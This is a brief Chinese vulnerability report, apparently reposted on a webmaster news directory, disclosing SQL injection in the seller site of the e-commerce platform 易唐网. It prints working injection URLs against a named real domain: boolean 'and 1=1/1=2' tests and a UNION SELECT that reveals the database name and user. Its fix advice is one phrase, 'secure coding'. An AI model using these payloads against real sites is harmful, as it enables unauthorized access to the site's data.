易唐网卖家网站SQL注入下载

易唐网卖家网站SQL注入电子商务网站易唐网卖家网站存在SQL注入漏洞

比较典型的Mysql数据库SQL注入

 

http://www.tradetang.com.cn/view.php?act=notice&tp=notice&id=73 and 1=1--

http://www.tradetang.com.cn/view.php?act=notice&tp=notice&id=73 and 1=2--



页面显示不同



 

http://www.tradetang.com.cn/view.php?act=notice&tp=notice&id=73 and 1=2 union%20select%20database(),user()--

修复方案:

安全编码

当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细